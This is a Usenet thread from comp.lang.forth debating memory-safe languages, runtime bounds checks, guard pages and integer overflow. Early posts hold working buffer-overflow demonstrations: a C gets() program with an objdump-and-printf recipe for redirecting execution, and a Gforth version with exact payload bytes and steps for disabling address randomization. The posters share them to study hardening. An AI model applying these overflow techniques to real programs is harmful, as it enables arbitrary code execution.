I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages.
Certainly
Forth can add the type of contractual safety requirements e.g.,
implementing bounds checking, of a "memory-safe language". Do we need to
work on libraries for these provisions?
What if the program writes a float to a byte location?
Do we have to go along and make Forth type-safe then?
Forth by design is as unsafe as any assembler. The only way to tame it
is to run it in a black box.
Krishna Myneni <krishna.myneni@ccreweb.org> writes:
I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages.
Which "renewed recent push" do you mean?
anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
of the renewed recent push for use of memory-safe languages.
Which "renewed recent push" do you mean?
https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages
https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/
I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages. Certainly
Forth can add the type of contractual safety requirements e.g.,
implementing bounds checking, of a "memory-safe language". Do we need to
work on libraries for these provisions?
Opinions?
#include <stdio.h>
#include <stdlib.h>
void MaliciousCode() {
printf("This code is malicious!\n");
printf("It will not execute normally.\n");
exit(0);
}
void GetInput() {
char buffer[8];
gets(buffer);
// puts(buffer);
}
int main() {
GetInput();
return 0;
}
=== end code ===
It will be a useful exercise to work up a similar example in Forth, as a
step to thinking about automatic hardening techniques (as opposed to
input sanitization).
gcc xxx.c
|xxx.c: In function ‘GetInput’:
I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages. Certainly
Forth can add the type of contractual safety requirements e.g.,
implementing bounds checking, of a "memory-safe language". Do we need to
work on libraries for these provisions?
Opinions?
Krishna Myneni
Groetjes Albert
On 2/03/2024 5:17 am, Paul Rubin wrote:
anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
of the renewed recent push for use of memory-safe languages.
Which "renewed recent push" do you mean?
https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages
https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/
It's good to have an application that works as planned but how does one
that misbehaves translate to 'security risk' and how does 'memory-safe' prevent that?
"ONCD has the belief that better metrics enable technology providers to
better plan, anticipate, and mitigate vulnerabilities before they become
a problem."
That may be their belief (fancy word for hope) but do they have anything
to back it up?
If you want an example, here's one that targets the Gforth version I
am currently working with:
: MaliciousCode ( -- )
." This code is malicious!" cr
." It will not execute normally." cr
bye ;
create buffer1 8 allot
:noname buffer1 96 stdin read-line . ; execute
bye
When I put this into a file xploit.fs and then perform
printf "01234567890123456789012345678901234567890123456789012345678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xdc\xed\xe9\xff\x7f\x00\x00"|
setarch `uname -m` -R gforth xploit.fs
I get the following output:
This code is malicious!
It will not execute normally.
anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
If you want an example, here's one that targets the Gforth version I
am currently working with:
: MaliciousCode ( -- )
." This code is malicious!" cr
." It will not execute normally." cr
bye ;
create buffer1 8 allot
:noname buffer1 96 stdin read-line . ; execute
bye
When I put this into a file xploit.fs and then perform
printf "01234567890123456789012345678901234567890123456789012345678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xdc\xed\xe9\xff\x7f\x00\x00"|
setarch `uname -m` -R gforth xploit.fs
I get the following output:
This code is malicious!
It will not execute normally.
I forgot to give a recipe for the printf above:
insert
' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop
right before the execute, and the dumps contain the bytes you have to
put into the printf after the 80th byte, in that order. I.e.:
: MaliciousCode ( -- )
." This code is malicious!" cr
." It will not execute normally." cr
bye ;
create buffer1 8 allot
:noname buffer1 96 stdin read-line . ;
' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop
execute
bye
and run it with
echo|setarch `uname -m` -R gforth xploit.fs
For the particular Gforth at hand, this produces:
7FFFE9E43160: 33 5B 57 55 55 55 00 00 - 3[WUUU..
7FFFE9AF6FF0: 68 DC ED E9 FF 7F 00 00 - h.......
exactly the bytes in the printf above.
On 3/1/24 09:54, Krishna Myneni wrote:
I'm wondering what the CS Forth users and Forth systems developers
make of the renewed recent push for use of memory-safe languages.
Certainly Forth can add the type of contractual safety requirements
e.g., implementing bounds checking, of a "memory-safe language". Do we
need to work on libraries for these provisions?
Opinions?
I played with a simple buffer overflow attack code in C, based on an
example I found at
https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf
=== begin code ===
/*
Demonstrate buffer overflow exploit.
Adapted from the example at:
https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf
Build with:
gcc -m32 -o exploit_demo exploit_demo.c
Normal run:
printf "abcdefg" | ./exploit_demo
Find the address of MaliciousCode() within the disassembled executable
objdump -S ./exploit_demo
from the listing above, note the 4-byte address of MaliciousCode
and put the address in the input string, from low-byte to high-byte.
Exploit Example: pass a string to overflow the buffer and run
exploit code
printf "abcdefghijklmnopqrst\x96\x91\x04\x08" | ./exploit_demo
replace the address 0x08049186 above with the one you obtained
from objdump command.
The exploit will cause MaliciousCode() to execute.
*/
#include <stdio.h>
#include <stdlib.h>
void MaliciousCode() {
printf("This code is malicious!\n");
printf("It will not execute normally.\n");
exit(0);
}
void GetInput() {
char buffer[8];
gets(buffer);
// puts(buffer);
}
int main() {
GetInput();
return 0;
}
=== end code ===
It will be a useful exercise to work up a similar example in Forth, as a
step to thinking about automatic hardening techniques (as opposed to
input sanitization).
--
Krishna
On 2/03/2024 5:17 am, Paul Rubin wrote:
anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
of the renewed recent push for use of memory-safe languages.
Which "renewed recent push" do you mean?
https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages
https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/
It's good to have an application that works as planned but how does one
that misbehaves translate to 'security risk' and how does 'memory-safe' prevent that?
Harden these without runtime checks:
: RT1 2 3e recurse ;
: RT2 drop fdrop recurse ;
On 3/2/24 10:08, Krishna Myneni wrote:
=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow
>>>rt1<<<
=== end example ===
To be clear, if you try to fill up the fp or data stack, as with your
rt1 example, kForth does give a segfault (and hence is susceptible to an exploit), while Gforth still gives the same error.
On 3/2/24 09:39, minforth wrote:
Harden these without runtime checks:
: RT1 2 3e recurse ;
: RT2 drop fdrop recurse ;
Let's see what python does:
def rt1():
return rt1()
rt1()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 2, in rt1
File "<stdin>", line 2, in rt1
File "<stdin>", line 2, in rt1
[Previous line repeated 996 more times]
RecursionError: maximum recursion depth exceeded
Clearly it is doing a runtime check. Similarly one could have RECURSE in Forth perform a runtime check to enforce a recursion depth limit, and
indeed this type of error is caught by several Forth systems:
=== kForth example ===
: rt1 recurse ;
ok
rt1
Line 2: VM Error(-258): Return stack corrupt
rt1
=== end example ===
=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow
>>>rt1<<<
=== end example ===
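As a rough illustration of the runtime-check idea above, here is a hedged sketch in standard Forth that uses an explicit counter rather than a modified RECURSE; the limit of 1000 and the names are invented, and -5 is the standard "return stack overflow" throw code:

variable depth#   0 depth# !
: rt1' ( -- )
   1 depth# +!
   depth# @ 1000 > if  0 depth# !  -5 throw  then   \ reset counter, report as return stack overflow
   recurse ;

Running rt1' then throws after 1000 nested calls instead of relying on the system to notice the overflowing return stack.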
Krishna Myneni <krishna.myneni@ccreweb.org> writes:
On 3/2/24 10:08, Krishna Myneni wrote:
=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow
>>>rt1<<<
=== end example ===
To be clear, if you try to fill up the fp or data stack, as with your
rt1 example, kForth does give a segfault (and hence is susceptible to an
exploit), while Gforth still gives the same error.
In Gforth on a Unix system, Unix produces a SIGSEGV when a stack runs
into a guard page. The signal handler then looks at the offending
address, and guesses that an access close to the bottom of a stack is
an underflow of that stack, and correspondingly for accesses close to
the top of a stack. This can be seen as follows:
With the gforth engine with the FP stack being empty:
fp@ 32769 - c@
*the terminal*:3:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<
fp@ 1+ c@
*the terminal*:4:8: error: Floating-point stack underflow
fp@ 1+ >>>c@<<<
It's good to have an application that works as planned but how does one
that misbehaves translate to 'security risk'
and how does 'memory-safe' prevent that?
That may be their belief (fancy word for hope) but do they have anything
to back it up?
Does this mean Gforth is
immune to arbitrary code execution attacks for the fp and data stack
overflow and underflow conditions?
In Forth, you have to create asserts yourself.
It's unclear what they mean, but it's certainly the case that studying
the historical corpus of CVE's tells us things about common types of
attacks. That tells us what areas need attention.
What I've found in practice is that there is almost no
slowdown. I suspect that the memory access itself is slower than the
range check, even when it usually is within the cpu cache.
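For illustration, a hedged sketch of such a range check in Forth; the region DATA-LO..DATA-HI and the word names are invented, and -9 is the standard "invalid memory address" throw code:

create data-area 4096 allot
data-area constant data-lo
data-area 4096 + constant data-hi
: ?addr ( addr -- addr )  dup data-lo data-hi within 0= if -9 throw then ;   \ -9: invalid memory address
: c@?   ( addr -- char )  ?addr c@ ;
: c!?   ( char addr -- )  ?addr c! ;

The check is one comparison and a conditional branch per access, which is the kind of cost being weighed against the memory access itself.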
I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages. Certainly
Forth can add the type of contractual safety requirements e.g.,
implementing bounds checking, of a "memory-safe language". Do we need to
work on libraries for these provisions?
Opinions?
--
Krishna Myneni
On 3/2/24 10:43, Anton Ertl wrote:
With the gforth engine with the FP stack being empty:
fp@ 32769 - c@
*the terminal*:3:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<
fp@ 1+ c@
*the terminal*:4:8: error: Floating-point stack underflow
fp@ 1+ >>>c@<<<
In the version of Gforth which I have (0.7.9_20220120),
fp@ 32769 - c@
*the terminal*:5:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<
However,
fp@ 65536 - c@ ok 1
and, worse,
1 fp@ 65536 - c! ok
So the guard pages are not a solution to pointer arithmetic bugs with
the stack pointers.
To make stack access memory safe, there has to be bounds checks on
reading and writing from/to stacks. This suggests that stacks should be arrays and stack operations always involve array read/write from arrays
with enforced bounds checking e.g. something like
: DUP STACK[ tos ]@ ; \ TOS returns an index to the top of the stack
: OVER STACK[ tos 1+ ]@ ;
etc., and ]@ and ]! perform bounds checks.
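A hedged sketch of what such bounds-checked access words might look like; the array STACK, its size, the index cell TOS, and the word names are illustrative only, not a claim about how any existing system implements its stacks:

64 constant #stack
create stack #stack cells allot
variable tos   0 tos !                                   \ cells currently in use
: ?idx ( u -- u )   dup tos @ u< 0= if -4 throw then ;   \ -4: stack underflow
: ]@   ( u -- x )   ?idx cells stack + @ ;
: ]!   ( x u -- )   ?idx cells stack + ! ;
: push ( x -- )     tos @ dup #stack u< 0= if -3 throw then  cells stack + !  1 tos +! ;
: over' ( -- x )    tos @ 2 - ]@ ;                       \ OVER in the style sketched above

After 1 push 2 push, over' . prints 1; an out-of-range index (including a negative one, which ?IDX sees as a huge unsigned value) throws instead of reading or writing outside the array.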
You can compile in DEBUG/RELEASE mode, whereby runtime checks
are no longer included in RELEASE mode. But these are quasi
pre-mortem traps, just like guard pages - they do not make Forth
safer as a language, for that it would need a-priori error traps.
An example:
: TE1 -1 dup c! ;
TE1 contains two errors: -1 is not a char and -1 is not a permitted
memory address. It must be possible to catch these during compilation.
You can run around in circles here, the basic problem is that there is
no formal specification for what a safe programming language is.
Analyses on the subject are dominated by the following: Memory errors,
type errors, range errors, race condition errors.
In order to develop Forth more in this direction, we would first need
a specification on "Hardened Forth" that is dedicated to these error
areas - and also marks UBs with defined exception codes. Ideally
accompanied by a test suite so that every Forth system developer can
check their own system.
Krishna Myneni <krishna.myneni@ccreweb.org> writes:
On 3/2/24 10:43, Anton Ertl wrote:
With the gforth engine with the FP stack being empty:
fp@ 32769 - c@
*the terminal*:3:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<
fp@ 1+ c@
*the terminal*:4:8: error: Floating-point stack underflow
fp@ 1+ >>>c@<<<
In the version of Gforth which I have (0.7.9_20220120),
fp@ 32769 - c@
*the terminal*:5:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<
However,
fp@ 65536 - c@ ok 1
and, worse,
1 fp@ 65536 - c! ok
So the guard pages are not a solution to pointer arithmetic bugs with
the stack pointers.
Yes, that is not their intention and not the intention of these
examples. The intention of these examples is to show that any memory
access will be interpreted as a stack underflow or overflow if it is
to a certain range of addresses.
A more serious issue is that, as implemented in Gforth (in particular, gforth-fast), stack underflows can be undetected in some cases: On
Gforth on an AMD64 system, with the data stack being empty:
600 pick ok 1
On gforth-fast, with the data stack being empty:
: foo 600 0 ?do nip loop cr . ; foo
0
*the terminal*:1:33: error: Stack underflow
: foo 600 0 ?do nip loop cr . ; >>>foo<<<
Backtrace:
kernel/basics.fs:312:27: 0 $7F30E3BDFE10 throw
Note that FOO actually performs the "cr .", so the stack underflow is
not detected by an access to the guard page. Instead, the text interpreter checks the stack pointer and reports a stack underflow.
The non-detection of the stack underflow is because NIP is implemented
as:
$7F30E3C72C90 nip 1->1
7F30E3917557: add r13,$08 #update sp
With the gforth engine, a similar scenario (involving DROP) is avoided because in this engine DROP loads the value being dropped exactly to
trigger stack underflow reports where they happen:
$7F55EBFA6C98 drop 0->0
7F55EBAC51C0: mov $50[r13],r15 #save ip (for accurate backtraces)
7F55EBAC51C4: add r15,$08 #update ip
7F55EBAC51C8: mov rax,[r14] #load dropped value
7F55EBAC51CB: add r14,$08 #update sp
Neither the deep PICK nor the loop that just NIPs or DROPs occurs in
practice.
The motivation for the otherwise unnecessary load in DROP (in gforth)
is code sequences like
drop 1
in cases where the stack is empty. The load in DROP results in
detecting the stack underflow at the DROP rather than at the "1".
Reporting a stack underflow at an operation that just pushes can
produce a WTF moment in the programmer; the gforth engine exists to
make debugging easier, and that includes avoiding such moments.
To make stack access memory safe, there has to be bounds checks on
reading and writing from/to stacks. This suggests that stacks should be
arrays and stack operations always involve array read/write from arrays
with enforced bounds checking e.g. something like
: DUP STACK[ tos ]@ ; \ TOS returns an index to the top of the stack
: OVER STACK[ tos 1+ ]@ ;
etc. and ]@ and ]! performs bounds checks.
With guard pages, that's not necessary. The normal bounded-depth
stack accesses (of words like 2DROP or 2OVER) are sure to hit the
guard pages if the stack is out-of-bounds; you may want to perform an otherwise unnecessary load on words like NIP, DROP, 2DROP etc. that do
not otherwise use (and thus load) the stack values that they consume,
but that's much cheaper than putting bounds checks on every stack
access. For unbounded stack-access words like PICK, a bounds check is appropriate.
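For the PICK case, a hedged sketch of such a check in standard Forth (not Gforth's actual code; -4 is the standard stack-underflow throw code):

: pick? ( xu ... x0 u -- xu ... x0 xu )
   dup depth 2 - u< 0= if -4 throw then   \ u must be smaller than the number of items below it
   pick ;

E.g. 10 20 30 1 pick? leaves 20 on top, while 0 pick? with nothing else on the stack throws -4 instead of reading whatever happens to lie beyond the stack.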
The intent of the stack array access was to avoid stack pointer
arithmetic altogether. Stack array access words provide a safe alternative
to doing stack pointer arithmetic in Forth code. Pointer arithmetic
appears to be the source of a lot of memory safety problems.
You can run around in circles here, the basic problem is that there is
no formal specification for what a safe programming language is.
Analyses on the subject are dominated by the following: Memory errors,
type errors, range errors, race condition errors.
In order to develop Forth more in this direction, we would first need
a specification on "Hardened Forth" that is dedicated to these error
areas - and also marks UBs with defined exception codes.
You can run around in circles here, the basic problem is that there is
no formal specification for what a safe programming language is.
They put out a request for proposals for a new language to be designed. The
eventual winner was Ada, but that choice came with some controversy at
the time. There were competing proposals that some people felt were
less bloated and still fulfilled the intended goals.
Misra-C is an example. There is no language specification, but quite a
number of rules against which a C program can be checked.
That's patchwork, but if it is sufficient for a program,
good for the program. As for language safety....
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.
On 3/03/2024 4:54 pm, Ron AARON wrote:
One of the criteria for 8th was security -- among other things, making it very difficult to do unsafe memory operations.
Has it paid off - by which I mean completed apps that out of the blue access invalid memory? I'm curious as to what exactly is behind the high rate of 'memory errors' that govt et al is reporting because in my limited experience programming in Forth, I'm just not seeing any. I wonder if it has something to do with the practices employed in those other languages - such as the use of third-party libraries which programmers use essentially on faith.
On 3/3/24 10:08, minforth wrote:
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.
Perhaps not, but I wrote my Forth system to provide some hand-holding, primarily for my own needs. My expectation is that the demand for Forth systems which don't address safety concerns will rapidly drop to zero.
While I, personally, rarely write code that has those sorts of issues
(at least, not in 30 years), I have worked in places where they were
fairly common. It depends a lot on the expertise and attention to detail
of the programmers, I think.
Ron AARON wrote:
While I, personally, rarely write code that has those sorts of issues
(at least, not in 30 years), I have worked in places where they were
fairly common. It depends a lot on the expertise and attention to
detail of the programmers, I think.
I think it's also a question of the scale of the software. Forth programs
are usually microscopically small and manageable. Typical modern software
can reach gigabytes and must be created by a team of developers who
sometimes don't even work in the same place. The attack surface for errors
is therefore orders of magnitude larger. Then there is a need for many more
a-priori security functions already in the programming language and
development tools, followed by software engineering test procedures.
Has it paid off - by which I mean completed apps that out of the blue access
invalid memory?
I'm curious as to what exactly is behind the high rate of
'memory errors' that govt et al is reporting because in my limited experience
programming in Forth, I'm just not seeing any.
What do I use while developing a recursive function: ?STACK.
: TEST drop depth ; ok
>>>drop<<< depth
Krishna Myneni wrote:
On 3/3/24 10:08, minforth wrote:
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.
Perhaps not, but I wrote my Forth system to provide some hand-holding,
primarily for my own needs. My expectation is that the demand for
Forth systems which don't address safety concerns will rapidly drop to
zero.
IIRC there have been a few Forth applications at NASA and for astronomy
(e.g. see Forth Inc. web site). I've already wondered how much convincing
had to be done for NASA not to disqualify Forth.
On 3/4/24 01:52, minforth wrote:
Krishna Myneni wrote:
On 3/3/24 10:08, minforth wrote:
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.
Perhaps not, but I wrote my Forth system to provide some hand-holding,
primarily for my own needs. My expectation is that the demand for
Forth systems which don't address safety concerns will rapidly drop to
zero.
IIRC there have been a few Forth applications at NASA and for astronomy
(e.g. see Forth Inc. web site). I've already wondered how much convincing
had to be done for NASA not to disqualify Forth.
The trend has been to go to "memory-safe" languages. There are many
instances in which simple run-time type checking for addresses has
resulted in saving me considerable debugging time -- usually just stack
order is incorrect, but the error can manifest in more complex ways as well.
I don't have any particular insight into the trends other than following
the news. I think there will be even greater pressure going forward to
use memory-safe languages for internet facing applications. The shift in academia towards those languages appears to have already happened.
Has it paid off - by which I mean completed apps that out of the blue
access invalid memory?
I'm curious as to what exactly is behind the high rate of 'memory
errors' that govt et al is reporting because in my limited experience programming in Forth, I'm just not seeing any.
IIRC there have been a few Forth applications at NASA and for astronomy
(e.g. see Forth Inc. web site).
mhx@iae.nl (mhx) writes:
What if the program writes a float to a byte location?
That's not a safety problem (as long as the location is big enough for
the float), so one can design a Safe Forth variant that allows that.
Yes but asking the system to find errors isn't looking - it's covering
one's butt.
Tristan Wibberley <tristan.wibberley+netnews2@alumni.manchester.ac.uk> writes:
If so, plenty of computers have alignment
requirements,
In general-purpose computers, that used to be the case in the 1990s,
but nowadays it is no longer the case. We have to use really old
hardware to test against alignment errors. ...
mhx@iae.nl (mhx) writes:
What if the program writes a float to a byte location?
That's not a safety problem (as long as the location is big enough for
the float), so one can design a Safe Forth variant that allows that.
I'm not very familiar with Forth yet; does this refer to writing to a
machine-addressed location?
If so, plenty of computers have alignment
requirements, so a DoS can be introduced by the above action.
Also, if you write a byte to a float location, a variety of problems can
be introduced, including running trap callbacks that were insufficiently
tested for the new program state, etc., killing the process and running
restart sequences where less volatile state can now be in an unusual
condition and new side-effects induced, and so on.
Memory safety means maintaining invariant relations wrt. each memory location.
On 05/03/2024 06:35, Anton Ertl wrote:
Tristan Wibberley <tristan.wibberley+netnews2@alumni.manchester.ac.uk> writes:
....
If so, plenty of computers have alignment
requirements,
In general-purpose computers, that used to be the case in the 1990s,
but nowadays it is no longer the case. We have to use really old
hardware to test against alignment errors. ...
Or special purpose computers that are not mass marketed, but I wasn't
aware they'd fixed all the public market computers. Thanks for the info.
AFAIK hacks are opportunistic i.e. could not reasonably be foreseen.
Such "errors" are forgivable. Not so, programmers who either don't
know where something might overflow, or knowing, fail to address it.
If you think you will revive Forth by jumping on that Rust bandwagon,
I think you're wrong.
First and foremost, because I think Rust is the wrong idea. It's been
tried before - Ada, Pascal, Java - in some sense: BASIC.
Good programmers exist because they are good programmers. Bad programs
exist because of bad programmers.
"Ada will not meet its major objective... for it is so complicated
that it defies the unambiguous definition that is essential for these purposes.
"...for it is so complicated...". That is the very definition of Rust.
All the time you're spending getting your code to compile, you're not creating programs.
I'd say that's the reverse of productivity. The higher the
abstraction, the more difficult it is to understand - let alone to
teach.
Lifetimes? Borrowing? Are you kidding me?
So, safety, yes. I like that very much. I ventured into that very
early and I never regretted it. But apart from some basic checks it
should stop at the point where I have to convince a compiler that I
know what I'm doing.
I tend to trust my Forth programs a lot more than my C ones
At no time during its writing did I consider hackers or inept users. Responsible programming was all.
On 6/03/2024 11:54 am, Paul Rubin wrote:
...
Those of us who have to
program in the 21st century, though, need all the help we can get.
"There is no hardware protection. Memory protection can be provided by
the access computer. But I prefer software that is correct by design." - C.M.
On 6/03/2024 7:23 pm, minforth wrote:
dxf wrote:
On 6/03/2024 11:54 am, Paul Rubin wrote:
... Those of us who have to
program in the 21st century, though, need all the help we can get.
"There is no hardware protection. Memory protection can be provided by
the access computer. But I prefer software that is correct by design." - C.M.
Confucius said:
Use program that treats integer wraparound as good feature and find yourself in big heap of dung
A 'memory-safe' system won't detect that. What now?
For example it's my experience one can input an out-of-range integer
into C and Forth compilers and neither will notice.... Programmers
too and I'm no exception.
dxf <dxforth@gmail.com> writes:
For example it's my experience one can input an out-of-range integer
into C and Forth compilers and neither will notice.... Programmers
too and I'm no exception.
These days I'd call C and Forth both niche languages, the niche being
low level systems code and small embedded programs. #1 on TIOBE is
Python, which uses arbitrary precision as the native integer type. That slows arithmetic down but it mostly eliminates the overflow problem.
IMHO that is what all high level languages should do by default. Of
course native machine types and low level languages (C, Forth, Rust,
Ada, etc.) should stay available for cases where you want to or have to program closer to the hardware.
#1 on TIOBE is
Python, which uses arbitrary precision as the native integer type. That slows arithmetic down but it mostly eliminates the overflow problem.
Years ago we had a crash with using old archived data files
in a more recent system. The old file format relied on having
max 64k (16bit) index size, while the evaluating system assumed
24bit, and so the index overflowed the allocated memory space.
On Sat, 09 Mar 2024 11:30:56 GMT
anton@mips.complang.tuwien.ac.at (Anton Ertl) wrote:
If implemented well, the slowdown is small in the common case (small
integers): E.g., on AMD64 an add, sub, or imul instruction just needs
to be followed by a jo which in the usual case is not taken and very
predictable.
Don't you also need to first check that both arguments are small
integers ?
If implemented well, the slowdown is small in the common case (small integers): E.g., on AMD64 an add, sub, or imul instruction just needs
to be followed by a jo which in the usual case is not taken and very predictable.
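At the Forth level, without access to the hardware overflow flag, the same trap-instead-of-wrap behaviour can be sketched portably; the name is invented and -11 is the standard "result out of range" throw code:

: +? ( n1 n2 -- n1+n2 )
   2dup + >r                        \ compute the wrapped sum
   r@ xor swap r@ xor and 0<        \ overflow iff both operands differ in sign from the sum
   if r> drop -11 throw then
   r> ;

The sign test works for any cell width, so the check does not need to know whether it runs on a 32-bit or 64-bit system.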
Python (particularly CPython), however, does not seem to have gone for efficient implementation;
I don't know what they do for arbitrarily large integers, but the
inner interpreter was pretty monstrous last I looked.
But integer overflow is orthogonal to memory safety.
There are many people who claim that wrapping behaviour for integer
overflow is a problem.
Java defines the basic types int and long to perform wraparound on
overflow,
anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
If implemented well, the slowdown is small in the common case (small
integers): E.g., on AMD64 an add, sub, or imul instruction just needs
to be followed by a jo which in the usual case is not taken and very
predictable.
It might be worse for RISC V.
I don't know what they do for arbitrarily large integers, but the
inner interpreter was pretty monstrous last I looked.
CPython has a fairly straightforward bytecode interpreter.
But integer overflow is orthogonal to memory safety.
There are many people who claim that wrapping behaviour for integer
overflow is a problem.
It has a problem because it's wrong! Of course it's deterministic
instead of being UB, and that makes some people feel better, but making
2+2=5 is also deterministic yet wrong.
Imagine x is a 50 element array and for whatever reason you try to
update x[60].
So the implementation might clobber 10 elements past the
end of the array (bad), or it can signal an error (the only thing that
makes sense), or in a feat of Java-like brilliance it might alias x[60]
to x[10] since 60 is 10 mod 50.
Java defines the basic types int and long to perform wraparound on
overflow,
Yes, a mistake IMHO.
2+2=5 is also deterministic yet wrong.
In Java 2+2 gives 4. What do you hope to gain by putting up straw men?
You just have no arguments but "It's wrong!" and straw men to back up
your opinion.
Any number representation has its problems - since there is no way to properly represent infinite precision.
Exclamations like "BUT IT'S WRONG" may be correct, but without a true alternative it's not gonna change much.
It depends a lot on how error checking is handled. You could return it
like "errno" or perror(). You could throw an exception. You could
return some special value - like a NULL pointer.
std::ofstream file("example.txt");
if (!file.is_open()) {
    // handle the error, e.g. report it and bail out
}
I mean, NULL is already a macro, it shouldn't be difficult to
gravitate to a better value.
Paul Rubin <no.email@nospam.invalid> writes:
anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
If implemented well, the slowdown is small in the common case (small
integers): E.g., on AMD64 an add, sub, or imul instruction just needs
to be followed by a jo which in the usual case is not taken and very
predictable.
It might be worse for RISC V.
It is. That's a failure of RISC-V.
In article <2024Mar10.092913@mips.complang.tuwien.ac.at>,
Anton Ertl <anton@mips.complang.tuwien.ac.at> wrote:
Paul Rubin <no.email@nospam.invalid> writes:
anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
If implemented well, the slowdown is small in the common case (small
integers): E.g., on AMD64 an add, sub, or imul instruction just needs
to be followed by a jo which in the usual case is not taken and very
predictable.
It might be worse for RISC V.
It is. That's a failure of RISC-V.
As far as I can tell it was a design choice for DEC Alpha and RISC-V.
Apparently flags are detrimental to parallelism.
You can't call that a failure because you don't like it.
You will need >6 parallel multi-precision additions before the two
carry flags of AMD64 with ADX are theoretically more limiting than the MIPS/Alpha/RISC-V approach. And to be practically more limiting, the
RISC-V implementation needs to be extremely wide (>36 instructions per
cycle) and the precision must be extremely high (to eliminate overlap
between chains as an issue).
No / not yet?
"The requested URL /anton/tmp/opt-ipc-uarch.eps : was not found on this server."
anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
2+2=5 is also deterministic yet wrong.
In Java 2+2 gives 4. What do you hope to gain by putting up straw men?
2+2=5 is obviously wrong and Java doesn't go quite that far. Java
instead insists that you can add two positive integers and get a
negative one. That's wrong the same way that 2+2=5 is.
It just doesn't
mess up actual programs as often, because the numbers involved are
bigger.
In what world can it be right for n to be a positive integer and n+1 to
be a negative integer? That's not how integers work.
Tony Hoare in 2009 said about null pointers:
Java-style wraparound
arithmetic is more of the same. A bug magnet,
Java also has null pointers, another possible mistake. Ada doesn't have them,
C++ has them because of its C heritage and
the need to support legacy code, but I believe that in "modern" C++
style you're supposed to use references instead of pointers, so you
can't have a null or uninitialized one.
wget http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps
Not at all. Modular arithmetic is not arithmetic in Z, but it's a commutative ring and has the nice properties of this algebraic
structure.
but even that works surprisingly well, so well that the RISC-V
designers have not seen a need to include an efficient way to detect
those cases where the result deviates from that in Z.
Still, the nice algebraic properties of modular arithmetic can be of
benefit even in such cases....
In what world can it be right for n to be a positive integer and n+1 to
be a negative integer? That's not how integers work.
It's how Java's int and long types work.
And if you want something closer to Z, Java also has BigInteger.
Tony Hoare in 2009 said about null pointers:
And the relevance is?
Java-style wraparound arithmetic is more of the same. A bug magnet,
Unsupported claim.
I think I saw the unintended result on a 32-bit machine
I don't know much about C++, but I would be surprised if they had
given up on uninitialized data. And an uninitialized reference is
certainly not better than a null reference.
The fact that Java idiomatics is to implement trees and linked lists
not in the object-oriented way I outlined above
Paul Rubin <no.email@nospam.invalid> writes:
<SNIP>
Java also has null pointers, another possible mistake. Ada doesn't have them,
Ada certainly has null.
C++ has them because of its C heritage and
the need to support legacy code, but I believe that in "modern" C++
style you're supposed to use references instead of pointers, so you
can't have a null or uninitialized one.
I don't know much about C++, but I would be surprised if they had
given up on uninitialized data. And an uninitialized reference is
certainly not better than a null reference.
- anton
Krishna Myneni <krishna.myneni@ccreweb.org> writes:
#include <stdio.h>
#include <stdlib.h>
void MaliciousCode() {
printf("This code is malicious!\n");
printf("It will not execute normally.\n");
exit(0);
}
void GetInput() {
char buffer[8];
gets(buffer);
// puts(buffer);
}
int main() {
GetInput();
return 0;
}
=== end code ===
It will be a useful exercise to work up a similar example in Forth, as a step to thinking about automatic hardening techniques (as opposed to
input sanitization).
Forth does not have an inherently unbounded input word like C's
gets(). And even typical C environments warn you when you compile
this code; e.g., when I compile it on Debian 11, I get:
gcc xxx.c
|xxx.c: In function ‘GetInput’:
|xxx.c:12:10: warning: implicit declaration of function ‘gets’; did
you mean ‘fgets’? [-Wimplicit-function-declaration]
| 12 | gets(buffer);
| | ^~~~
| | fgets
|/usr/bin/ld: /tmp/ccC9Qbu7.o: in function `GetInput':
|xxx.c:(.text+0x3b): warning: the `gets' function is dangerous and
should not be used.
So, they removed gets() from stdio.h, and added a warning to the
linker. "man gets" tells me:
|_Never use this function_
|[...]
|ISO C11 removes the specification of gets() from the C language, and
